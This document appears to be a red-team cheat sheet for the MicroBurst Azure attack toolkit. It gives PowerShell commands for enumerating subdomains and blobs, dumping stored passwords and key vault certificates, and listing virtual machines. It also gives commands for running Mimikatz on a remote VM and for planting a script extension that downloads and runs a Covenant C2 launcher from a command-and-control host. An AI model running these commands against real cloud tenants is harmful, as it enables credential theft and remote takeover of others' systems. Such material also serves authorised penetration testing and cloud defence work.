# MicroBurst
## MicroBurst
#### Domain Enumeration (passive:
Subdomain enum:
```
Invoke-EnumerateAzureSubDomains -Base CLIENT -Verbose
```
Blob enum:
```
Invoke-EnumerateAzureBlobs -Base CLIENT -BingAPIKey 00000000001234567899876543210123
```
#### authenicate:
```
Connect-AzAccount
```
#### Credentials:
Gather Passwords:
```
Get-AzPasswords -Verbose
```
Cert:
```
Get-AzurePasswords -Keys N -AppServices N -Verbose
# Then execute the ps file:
AuthenticateAs-XXXXX.ps1
```
Key Vaults:
```
Get-AzureKeyVaults-Automation -ExportCerts Y -Subscription "SUBSCRIPTION_NAME" -Verbose | ft -AutoSize
```
#### Virtual machines:
Enum:
Get-AzVM | Format-Table -Wrap -AutoSize -Property ResourceGroupName,Name,Location
Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
VM Extensions:
Get-AzureVMExtensionSettings
Get-AzureVMExtensionSettings | Export-CSV -Path C:\tmp\results.csv
run commands:
```
Invoke-AzureRmVMRunCommand -ResourceGroupName VMResourceGroupName -VMName VMName -CommandId RunPowerShellScript -ScriptPath PathToYourScript
# mimikatz?
Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
# Script extension (gather info from Get-AzureVMExtensionSettings):
Set-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName CSETest -Location westcentralus -FileUri 'https://c2.netspi.invalid/netspi/launcher.ps1' -Run 'launcher.ps1' -Name CovenantScriptExtension
# Cleanup
Remove-AzVMCustomScriptExtension -ResourceGroupName TESTER -VMName MGITest -Name CovenantScriptExtension
```
Triggering a webhook:
```
$uri = "https://s15events.azure-automation.net/webhooks?token=h6[REDACTED]%3d" $AccountInfo = @(@{RequestBody=@{Username="BlogDemoUser";Password="Password123"}}) $body = ConvertTo-Json -InputObject $AccountInfo $response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
```